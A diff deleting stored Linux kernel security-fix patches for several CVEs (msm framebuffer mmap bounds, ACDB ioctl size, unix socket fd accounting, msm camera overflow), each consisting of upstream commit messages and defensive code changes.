- 1 file changed, 10 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/video/msm/msm_fb.c b/drivers/video/msm/msm_fb.c
-index 7d11fa9..2b626a0 100644
---- a/drivers/video/msm/msm_fb.c
-+++ b/drivers/video/msm/msm_fb.c
-@@ -1004,22 +1004,20 @@ static int msm_fb_mmap(struct fb_info *info, struct vm_area_struct * vma)
- u32 len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.smem_len);
- unsigned long off = vma->vm_pgoff << PAGE_SHIFT;
- struct msm_fb_data_type *mfd = (struct msm_fb_data_type *)info->par;
-- if (off >= len) {
-- /* memory mapped io */
-- off -= len;
-- if (info->var.accel_flags) {
-- mutex_unlock(&info->lock);
-- return -EINVAL;
-- }
-- start = info->fix.mmio_start;
-- len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
-- }
-
-+ if (!start)
-+ return -EINVAL;
-+
-+ if ((vma->vm_end <= vma->vm_start) ||
-+ (off >= len) ||
-+ ((vma->vm_end - vma->vm_start) > (len - off)))
-+ return -EINVAL;
- /* Set VM flags. */
- start &= PAGE_MASK;
-- if ((vma->vm_end - vma->vm_start + off) > len)
-- return -EINVAL;
- off += start;
-+ if (off < start)
-+ return -EINVAL;
-+
- vma->vm_pgoff = off >> PAGE_SHIFT;
- /* This is an IO map - tell maydump to skip this VMA */
- vma->vm_flags |= VM_IO | VM_RESERVED;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch
deleted file mode 100644
index bb97f67c..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From cdde1a87792a52274763eb006d326ca254ec3c63 Mon Sep 17 00:00:00 2001
-From: Manoj Rao
-Date: Fri, 12 Apr 2013 18:37:14 -0700
-Subject: msm: msm_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-CRs-Fixed: 474706
-Change-Id: If25166f2732433ef967e99c716440030b567aae9
-Signed-off-by: Manoj Rao
----
- drivers/video/msm/msm_fb.c | 21 ++++++++-------------
- 1 file changed, 8 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/video/msm/msm_fb.c b/drivers/video/msm/msm_fb.c
-index adf50ed..9efe766 100644
---- a/drivers/video/msm/msm_fb.c
-+++ b/drivers/video/msm/msm_fb.c
-@@ -1166,23 +1166,18 @@ static int msm_fb_mmap(struct fb_info *info, struct vm_area_struct * vma)
- if (!start)
- return -EINVAL;
-
-- msm_fb_pan_idle(mfd);
-- if (off >= len) {
-- /* memory mapped io */
-- off -= len;
-- if (info->var.accel_flags) {
-- mutex_unlock(&info->lock);
-- return -EINVAL;
-- }
-- start = info->fix.mmio_start;
-- len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
-- }
-+ if ((vma->vm_end <= vma->vm_start) ||
-+ (off >= len) ||
-+ ((vma->vm_end - vma->vm_start) > (len - off)))
-+ return -EINVAL;
-
-+ msm_fb_pan_idle(mfd);
- /* Set VM flags. */
- start &= PAGE_MASK;
-- if ((vma->vm_end - vma->vm_start + off) > len)
-- return -EINVAL;
- off += start;
-+ if (off < start)
-+ return -EINVAL;
-+
- vma->vm_pgoff = off >> PAGE_SHIFT;
- /* This is an IO map - tell maydump to skip this VMA */
- vma->vm_flags |= VM_IO | VM_RESERVED;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch
deleted file mode 100644
index be377d7f..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From b44d5f71da7d2c44a7575376c582f9f1cde1cf6d Mon Sep 17 00:00:00 2001
-From: Ben Romberger
-Date: Wed, 3 Apr 2013 16:20:18 -0700
-Subject: ASoC: msm: Add size safety check to ACDB driver
-
-Check that the size sent by userspace is not larger
-then the internal amount allowed. This protects
-against overflowing the stack due to an invalid size.
-
-Change-Id: I4a5b5ca5212bea32b671027d68a66367c5d4c4e7
-CRs-fixed: 470222
-Signed-off-by: Ben Romberger
----
- sound/soc/msm/qdsp6v2/audio_acdb.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/audio_acdb.c b/sound/soc/msm/qdsp6v2/audio_acdb.c
-index 16d6e81c..b2a469b 100644
---- a/sound/soc/msm/qdsp6v2/audio_acdb.c
-+++ b/sound/soc/msm/qdsp6v2/audio_acdb.c
-@@ -1064,7 +1064,7 @@ static long acdb_ioctl(struct file *f,
- goto done;
- }
-
-- if (size <= 0) {
-+ if ((size <= 0) || (size > sizeof(data))) {
- pr_err("%s: Invalid size sent to driver: %d\n",
- __func__, size);
- result = -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch
deleted file mode 100644
index 2262a201..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 76fb3e419e2b149292c3adf1e9171e2b542831bf Mon Sep 17 00:00:00 2001
-From: Ben Romberger
-Date: Wed, 8 May 2013 12:46:26 -0700
-Subject: msm: audio: qdsp6v2: Add size safety check to ACDB driver
-
-Check that the size sent by userspace is not larger
-then the internal amount allowed. This protects
-against overflowing the stack due to an invalid size.
-
-Change-Id: I8230fdb00a7b57d398929e8ab0eb6587476f3db1
-CRs-fixed: 470222
-Signed-off-by: Ben Romberger
----
- arch/arm/mach-msm/qdsp6v2/audio_acdb.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_acdb.c b/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-index 8efd808..aad14be 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-@@ -770,7 +770,7 @@ static long acdb_ioctl(struct file *f,
- goto done;
- }
-
-- if (size <= 0) {
-+ if ((size <= 0) || (size > sizeof(data))) {
- pr_err("%s: Invalid size sent to driver: %d\n",
- __func__, size);
- result = -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch
deleted file mode 100644
index 3cb07295..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch
+++ /dev/null
@@ -1,141 +0,0 @@
-From a5a6cf8c405e826ff7ed1308dde72560c0ed4854 Mon Sep 17 00:00:00 2001
-From: willy tarreau
-Date: Sun, 10 Jan 2016 07:54:56 +0100
-Subject: unix: properly account for FDs passed over unix sockets
-
-commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 upstream.
-
-It is possible for a process to allocate and accumulate far more FDs than
-the process' limit by sending them over a unix socket then closing them
-to keep the process' fd count low.
-
-This change addresses this problem by keeping track of the number of FDs
-in flight per user and preventing non-privileged processes from having
-more FDs in flight than their configured FD limit.
-
-Reported-by: socketpair@gmail.com
-Reported-by: Tetsuo Handa
-Mitigates: CVE-2013-4312 (Linux 2.0+)
-Suggested-by: Linus Torvalds
-Acked-by: Hannes Frederic Sowa
-Signed-off-by: Willy Tarreau
-Signed-off-by: David S. Miller
-[carnil: Backported to 3.16: adjust context]
-Signed-off-by: Ben Hutchings
----
- include/linux/sched.h | 1 +
- net/unix/af_unix.c | 24 ++++++++++++++++++++----
- net/unix/garbage.c | 14 ++++++++++----
- 3 files changed, 31 insertions(+), 8 deletions(-)
-
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 9b9ac29..2bffa8a 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -709,6 +709,7 @@ struct user_struct {
- unsigned long mq_bytes; /* How many bytes can be allocated to mqueue? */
- #endif
- unsigned long locked_shm; /* How many pages of mlocked shm ? */
-+ unsigned long unix_inflight; /* How many files in flight in unix sockets */
-
- #ifdef CONFIG_KEYS
- struct key *uid_keyring; /* UID specific keyring */
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 6cb363d..6798b3c 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1472,6 +1472,21 @@ static void unix_destruct_scm(struct sk_buff *skb)
- sock_wfree(skb);
- }
-
-+/*
-+ * The "user->unix_inflight" variable is protected by the garbage
-+ * collection lock, and we just read it locklessly here. If you go
-+ * over the limit, there might be a tiny race in actually noticing
-+ * it across threads. Tough.
-+ */
-+static inline bool too_many_unix_fds(struct task_struct *p)
-+{
-+ struct user_struct *user = current_user();
-+
-+ if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
-+ return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
-+ return false;
-+}
-+
- #define MAX_RECURSION_LEVEL 4
-
- static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
-@@ -1480,6 +1495,9 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- unsigned char max_level = 0;
- int unix_sock_count = 0;
-
-+ if (too_many_unix_fds(current))
-+ return -ETOOMANYREFS;
-+
- for (i = scm->fp->count - 1; i >= 0; i--) {
- struct sock *sk = unix_get_socket(scm->fp->fp[i]);
-
-@@ -1501,10 +1519,8 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- if (!UNIXCB(skb).fp)
- return -ENOMEM;
-
-- if (unix_sock_count) {
-- for (i = scm->fp->count - 1; i >= 0; i--)
-- unix_inflight(scm->fp->fp[i]);
-- }
-+ for (i = scm->fp->count - 1; i >= 0; i--)
-+ unix_inflight(scm->fp->fp[i]);
- return max_level;
- }
-
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index 00d3e56..fd1a840 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -125,9 +125,11 @@ struct sock *unix_get_socket(struct file *filp)
- void unix_inflight(struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-+
-+ spin_lock(&unix_gc_lock);
-+
- if (s) {
- struct unix_sock *u = unix_sk(s);
-- spin_lock(&unix_gc_lock);
- if (atomic_long_inc_return(&u->inflight) == 1) {
- BUG_ON(!list_empty(&u->link));
- list_add_tail(&u->link, &gc_inflight_list);
-@@ -135,22 +137,26 @@ void unix_inflight(struct file *fp)
- BUG_ON(list_empty(&u->link));
- }
- unix_tot_inflight++;
-- spin_unlock(&unix_gc_lock);
- }
-+ fp->f_cred->user->unix_inflight++;
-+ spin_unlock(&unix_gc_lock);
- }
-
- void unix_notinflight(struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-+
-+ spin_lock(&unix_gc_lock);
-+
- if (s) {
- struct unix_sock *u = unix_sk(s);
-- spin_lock(&unix_gc_lock);
- BUG_ON(list_empty(&u->link));
- if (atomic_long_dec_and_test(&u->inflight))
- list_del_init(&u->link);
- unix_tot_inflight--;
-- spin_unlock(&unix_gc_lock);
- }
-+ fp->f_cred->user->unix_inflight--;
-+ spin_unlock(&unix_gc_lock);
- }
-
- static void scan_inflight(struct sock *x, void (*func)(struct unix_sock *),
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch
deleted file mode 100644
index ad02c976..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From 5ea820046ee399214221c0bb817eb35d304c9604 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa
-Date: Wed, 3 Feb 2016 02:11:03 +0100
-Subject: unix: correctly track in-flight fds in sending process user_struct
-
-commit 415e3d3e90ce9e18727e8843ae343eda5a58fad6 upstream.
-
-The commit referenced in the Fixes tag incorrectly accounted the number
-of in-flight fds over a unix domain socket to the original opener
-of the file-descriptor. This allows another process to arbitrary
-deplete the original file-openers resource limit for the maximum of
-open files. Instead the sending processes and its struct cred should
-be credited.
-
-To do so, we add a reference counted struct user_struct pointer to the
-scm_fp_list and use it to account for the number of inflight unix fds.
-
-Fixes: 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets")
-Reported-by: David Herrmann
-Cc: David Herrmann
-Cc: Willy Tarreau
-Cc: Linus Torvalds
-Suggested-by: Linus Torvalds
-Signed-off-by: Hannes Frederic Sowa
-Signed-off-by: David S. Miller
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings
----
- include/net/af_unix.h | 4 ++--
- include/net/scm.h | 1 +
- net/core/scm.c | 7 +++++++
- net/unix/af_unix.c | 4 ++--
- net/unix/garbage.c | 8 ++++----
- 5 files changed, 16 insertions(+), 8 deletions(-)
-
-diff --git a/include/net/af_unix.h b/include/net/af_unix.h
-index f4842f7..a69bfee 100644
---- a/include/net/af_unix.h
-+++ b/include/net/af_unix.h
-@@ -6,8 +6,8 @@
- #include
- #include
-
--extern void unix_inflight(struct file *fp);
--extern void unix_notinflight(struct file *fp);
-+extern void unix_inflight(struct user_struct *user, struct file *fp);
-+extern void unix_notinflight(struct user_struct *user, struct file *fp);
- extern void unix_gc(void);
- extern void wait_for_unix_gc(void);
- extern struct sock *unix_get_socket(struct file *filp);
-diff --git a/include/net/scm.h b/include/net/scm.h
-index 5da0a7b..9822a68 100644
---- a/include/net/scm.h
-+++ b/include/net/scm.h
-@@ -16,6 +16,7 @@ struct scm_fp_list {
- struct list_head list;
- short count;
- short max;
-+ struct user_struct *user;
- struct file *fp[SCM_MAX_FD];
- };
-
-diff --git a/net/core/scm.c b/net/core/scm.c
-index 51b4d52..9adabed 100644
---- a/net/core/scm.c
-+++ b/net/core/scm.c
-@@ -80,6 +80,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- *fplp = fpl;
- fpl->count = 0;
- fpl->max = SCM_MAX_FD;
-+ fpl->user = NULL;
- }
- fpp = &fpl->fp[fpl->count];
-
-@@ -100,6 +101,10 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- *fpp++ = file;
- fpl->count++;
- }
-+
-+ if (!fpl->user)
-+ fpl->user = get_uid(current_user());
-+
- return num;
- }
-
-@@ -124,6 +129,7 @@ void __scm_destroy(struct scm_cookie *scm)
- list_del(&fpl->list);
- for (i=fpl->count-1; i>=0; i--)
- fput(fpl->fp[i]);
-+ free_uid(fpl->user);
- kfree(fpl);
- }
-
-@@ -342,6 +348,7 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
- for (i = 0; i < fpl->count; i++)
- get_file(fpl->fp[i]);
- new_fpl->max = new_fpl->count;
-+ new_fpl->user = get_uid(fpl->user);
- }
- return new_fpl;
- }
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 6798b3c..390e079 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1454,7 +1454,7 @@ static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- UNIXCB(skb).fp = NULL;
-
- for (i = scm->fp->count-1; i >= 0; i--)
-- unix_notinflight(scm->fp->fp[i]);
-+ unix_notinflight(scm->fp->user, scm->fp->fp[i]);
- }
-
- static void unix_destruct_scm(struct sk_buff *skb)
-@@ -1520,7 +1520,7 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- return -ENOMEM;
-
- for (i = scm->fp->count - 1; i >= 0; i--)
-- unix_inflight(scm->fp->fp[i]);
-+ unix_inflight(scm->fp->user, scm->fp->fp[i]);
- return max_level;
- }
-
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index fd1a840..33a21260 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -122,7 +122,7 @@ struct sock *unix_get_socket(struct file *filp)
- * descriptor if it is for an AF_UNIX socket.
- */
-
--void unix_inflight(struct file *fp)
-+void unix_inflight(struct user_struct *user, struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-@@ -138,11 +138,11 @@ void unix_inflight(struct file *fp)
- }
- unix_tot_inflight++;
- }
-- fp->f_cred->user->unix_inflight++;
-+ user->unix_inflight++;
- spin_unlock(&unix_gc_lock);
- }
-
--void unix_notinflight(struct file *fp)
-+void unix_notinflight(struct user_struct *user, struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-@@ -155,7 +155,7 @@ void unix_notinflight(struct file *fp)
- list_del_init(&u->link);
- unix_tot_inflight--;
- }
-- fp->f_cred->user->unix_inflight--;
-+ user->unix_inflight--;
- spin_unlock(&unix_gc_lock);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch b/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch
deleted file mode 100644
index 0d2161ce..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch
+++ /dev/null
@@ -1,140 +0,0 @@
-From 712f4aad406bb1ed67f3f98d04c044191f0ff593 Mon Sep 17 00:00:00 2001
-From: willy tarreau
-Date: Sun, 10 Jan 2016 07:54:56 +0100
-Subject: unix: properly account for FDs passed over unix sockets
-
-It is possible for a process to allocate and accumulate far more FDs than
-the process' limit by sending them over a unix socket then closing them
-to keep the process' fd count low.
-
-This change addresses this problem by keeping track of the number of FDs
-in flight per user and preventing non-privileged processes from having
-more FDs in flight than their configured FD limit.
-
-Reported-by: socketpair@gmail.com
-Reported-by: Tetsuo Handa
-Mitigates: CVE-2013-4312 (Linux 2.0+)
-Suggested-by: Linus Torvalds
-Acked-by: Hannes Frederic Sowa
-Signed-off-by: Willy Tarreau
-Signed-off-by: David S. Miller
----
- include/linux/sched.h | 1 +
- net/unix/af_unix.c | 24 ++++++++++++++++++++----
- net/unix/garbage.c | 13 ++++++++-----
- 3 files changed, 29 insertions(+), 9 deletions(-)
-
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index edad7a4..fbf25f1 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -830,6 +830,7 @@ struct user_struct {
- unsigned long mq_bytes; /* How many bytes can be allocated to mqueue? */
- #endif
- unsigned long locked_shm; /* How many pages of mlocked shm ? */
-+ unsigned long unix_inflight; /* How many files in flight in unix sockets */
-
- #ifdef CONFIG_KEYS
- struct key *uid_keyring; /* UID specific keyring */
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index ef05cd9..e3f85bc 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1513,6 +1513,21 @@ static void unix_destruct_scm(struct sk_buff *skb)
- sock_wfree(skb);
- }
-
-+/*
-+ * The "user->unix_inflight" variable is protected by the garbage
-+ * collection lock, and we just read it locklessly here. If you go
-+ * over the limit, there might be a tiny race in actually noticing
-+ * it across threads. Tough.
-+ */
-+static inline bool too_many_unix_fds(struct task_struct *p)
-+{
-+ struct user_struct *user = current_user();
-+
-+ if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
-+ return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
-+ return false;
-+}
-+
- #define MAX_RECURSION_LEVEL 4
-
- static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
-@@ -1521,6 +1536,9 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- unsigned char max_level = 0;
- int unix_sock_count = 0;
-
-+ if (too_many_unix_fds(current))
-+ return -ETOOMANYREFS;
-+
- for (i = scm->fp->count - 1; i >= 0; i--) {
- struct sock *sk = unix_get_socket(scm->fp->fp[i]);
-
-@@ -1542,10 +1560,8 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- if (!UNIXCB(skb).fp)
- return -ENOMEM;
-
-- if (unix_sock_count) {
-- for (i = scm->fp->count - 1; i >= 0; i--)
-- unix_inflight(scm->fp->fp[i]);
-- }
-+ for (i = scm->fp->count - 1; i >= 0; i--)
-+ unix_inflight(scm->fp->fp[i]);
- return max_level;
- }
-
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index a73a226..8fcdc22 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -120,11 +120,11 @@ void unix_inflight(struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-+ spin_lock(&unix_gc_lock);
-+
- if (s) {
- struct unix_sock *u = unix_sk(s);
-
-- spin_lock(&unix_gc_lock);
--
- if (atomic_long_inc_return(&u->inflight) == 1) {
- BUG_ON(!list_empty(&u->link));
- list_add_tail(&u->link, &gc_inflight_list);
-@@ -132,25 +132,28 @@ void unix_inflight(struct file *fp)
- BUG_ON(list_empty(&u->link));
- }
- unix_tot_inflight++;
-- spin_unlock(&unix_gc_lock);
- }
-+ fp->f_cred->user->unix_inflight++;
-+ spin_unlock(&unix_gc_lock);
- }
-
- void unix_notinflight(struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-+ spin_lock(&unix_gc_lock);
-+
- if (s) {
- struct unix_sock *u = unix_sk(s);
-
-- spin_lock(&unix_gc_lock);
- BUG_ON(list_empty(&u->link));
-
- if (atomic_long_dec_and_test(&u->inflight))
- list_del_init(&u->link);
- unix_tot_inflight--;
-- spin_unlock(&unix_gc_lock);
- }
-+ fp->f_cred->user->unix_inflight--;
-+ spin_unlock(&unix_gc_lock);
- }
-
- static void scan_inflight(struct sock *x, void (*func)(struct unix_sock *),
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch b/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch
deleted file mode 100644
index 660997e9..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch
+++ /dev/null
@@ -1,158 +0,0 @@
-From 415e3d3e90ce9e18727e8843ae343eda5a58fad6 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa
-Date: Wed, 3 Feb 2016 02:11:03 +0100
-Subject: unix: correctly track in-flight fds in sending process user_struct
-
-The commit referenced in the Fixes tag incorrectly accounted the number
-of in-flight fds over a unix domain socket to the original opener
-of the file-descriptor. This allows another process to arbitrary
-deplete the original file-openers resource limit for the maximum of
-open files. Instead the sending processes and its struct cred should
-be credited.
-
-To do so, we add a reference counted struct user_struct pointer to the
-scm_fp_list and use it to account for the number of inflight unix fds.
-
-Fixes: 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets")
-Reported-by: David Herrmann
-Cc: David Herrmann
-Cc: Willy Tarreau
-Cc: Linus Torvalds
-Suggested-by: Linus Torvalds
-Signed-off-by: Hannes Frederic Sowa
-Signed-off-by: David S. Miller
----
- include/net/af_unix.h | 4 ++--
- include/net/scm.h | 1 +
- net/core/scm.c | 7 +++++++
- net/unix/af_unix.c | 4 ++--
- net/unix/garbage.c | 8 ++++----
- 5 files changed, 16 insertions(+), 8 deletions(-)
-
-diff --git a/include/net/af_unix.h b/include/net/af_unix.h
-index 2a91a05..9b4c418 100644
---- a/include/net/af_unix.h
-+++ b/include/net/af_unix.h
-@@ -6,8 +6,8 @@
- #include
- #include
-
--void unix_inflight(struct file *fp);
--void unix_notinflight(struct file *fp);
-+void unix_inflight(struct user_struct *user, struct file *fp);
-+void unix_notinflight(struct user_struct *user, struct file *fp);
- void unix_gc(void);
- void wait_for_unix_gc(void);
- struct sock *unix_get_socket(struct file *filp);
-diff --git a/include/net/scm.h b/include/net/scm.h
-index 262532d..59fa93c 100644
---- a/include/net/scm.h
-+++ b/include/net/scm.h
-@@ -21,6 +21,7 @@ struct scm_creds {
- struct scm_fp_list {
- short count;
- short max;
-+ struct user_struct *user;
- struct file *fp[SCM_MAX_FD];
- };
-
-diff --git a/net/core/scm.c b/net/core/scm.c
-index 14596fb..2696aef 100644
---- a/net/core/scm.c
-+++ b/net/core/scm.c
-@@ -87,6 +87,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- *fplp = fpl;
- fpl->count = 0;
- fpl->max = SCM_MAX_FD;
-+ fpl->user = NULL;
- }
- fpp = &fpl->fp[fpl->count];
-
-@@ -107,6 +108,10 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- *fpp++ = file;
- fpl->count++;
- }
-+
-+ if (!fpl->user)
-+ fpl->user = get_uid(current_user());
-+
- return num;
- }
-
-@@ -119,6 +124,7 @@ void __scm_destroy(struct scm_cookie *scm)
- scm->fp = NULL;
- for (i=fpl->count-1; i>=0; i--)
- fput(fpl->fp[i]);
-+ free_uid(fpl->user);
- kfree(fpl);
- }
- }
-@@ -336,6 +342,7 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
- for (i = 0; i < fpl->count; i++)
- get_file(fpl->fp[i]);
- new_fpl->max = new_fpl->count;
-+ new_fpl->user = get_uid(fpl->user);
- }
- return new_fpl;
- }
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 49d5093..29be035 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1496,7 +1496,7 @@ static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- UNIXCB(skb).fp = NULL;
-
- for (i = scm->fp->count-1; i >= 0; i--)
-- unix_notinflight(scm->fp->fp[i]);
-+ unix_notinflight(scm->fp->user, scm->fp->fp[i]);
- }
-
- static void unix_destruct_scm(struct sk_buff *skb)
-@@ -1561,7 +1561,7 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- return -ENOMEM;
-
- for (i = scm->fp->count - 1; i >= 0; i--)
-- unix_inflight(scm->fp->fp[i]);
-+ unix_inflight(scm->fp->user, scm->fp->fp[i]);
- return max_level;
- }
-
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index 8fcdc22..6a0d485 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -116,7 +116,7 @@ struct sock *unix_get_socket(struct file *filp)
- * descriptor if it is for an AF_UNIX socket.
- */
-
--void unix_inflight(struct file *fp)
-+void unix_inflight(struct user_struct *user, struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-@@ -133,11 +133,11 @@ void unix_inflight(struct file *fp)
- }
- unix_tot_inflight++;
- }
-- fp->f_cred->user->unix_inflight++;
-+ user->unix_inflight++;
- spin_unlock(&unix_gc_lock);
- }
-
--void unix_notinflight(struct file *fp)
-+void unix_notinflight(struct user_struct *user, struct file *fp)
- {
- struct sock *s = unix_get_socket(fp);
-
-@@ -152,7 +152,7 @@ void unix_notinflight(struct file *fp)
- list_del_init(&u->link);
- unix_tot_inflight--;
- }
-- fp->f_cred->user->unix_inflight--;
-+ user->unix_inflight--;
- spin_unlock(&unix_gc_lock);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch
deleted file mode 100644
index f89cffbd..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch
+++ /dev/null
@@ -1,125 +0,0 @@
-From 8c5300aec8cd9882b89e9d169680221541da0d7f Mon Sep 17 00:00:00 2001
-From: Monika Alekhya
-Date: Fri, 28 Jun 2013 18:23:40 +0530
-Subject: msm:camera: Fix overflow issue in ioctl_hw_cmds function
-
- 'len' is of type signed int 32bit,but the assigned value
- may exceed maximum unsigned int32 range.Add overflow check
- and graceful exit if 'm'exceeds UINT32_MAX value.
-
-Change-Id: I38f0d10a0cb44d08d0054f91044fc891c246ebd1
-CRs-Fixed: 493314
-Signed-off-by: Monika Alekhya
----
- drivers/media/video/msm/gemini/msm_gemini_sync.c | 9 ++++++++-
- drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c | 10 ++++++++--
- drivers/media/video/msm/mercury/msm_mercury_sync.c | 10 ++++++++--
- 3 files changed, 24 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/video/msm/gemini/msm_gemini_sync.c b/drivers/media/video/msm/gemini/msm_gemini_sync.c
-index ef727fd..f5089ae 100644
---- a/drivers/media/video/msm/gemini/msm_gemini_sync.c
-+++ b/drivers/media/video/msm/gemini/msm_gemini_sync.c
-@@ -23,6 +23,7 @@
- #include
- #include
-
-+# define UINT32_MAX (4294967295U)
- static int release_buf;
-
- /* size is based on 4k page size */
-@@ -804,7 +805,7 @@ int msm_gemini_ioctl_hw_cmds(struct msm_gemini_device *pgmn_dev,
- void * __user arg)
- {
- int is_copy_to_user;
-- int len;
-+ uint32_t len;
- uint32_t m;
- struct msm_gemini_hw_cmds *hw_cmds_p;
- struct msm_gemini_hw_cmd *hw_cmd_p;
-@@ -813,6 +814,12 @@ int msm_gemini_ioctl_hw_cmds(struct msm_gemini_device *pgmn_dev,
- GMN_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- return -EFAULT;
- }
-+ if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_gemini_hw_cmds))/
-+ sizeof(struct msm_gemini_hw_cmd)))) {
-+ GMN_PR_ERR("%s:%d] outof range of hwcmds\n",
-+ __func__, __LINE__);
-+ return -EINVAL;
-+ }
-
- len = sizeof(struct msm_gemini_hw_cmds) +
- sizeof(struct msm_gemini_hw_cmd) * (m - 1);
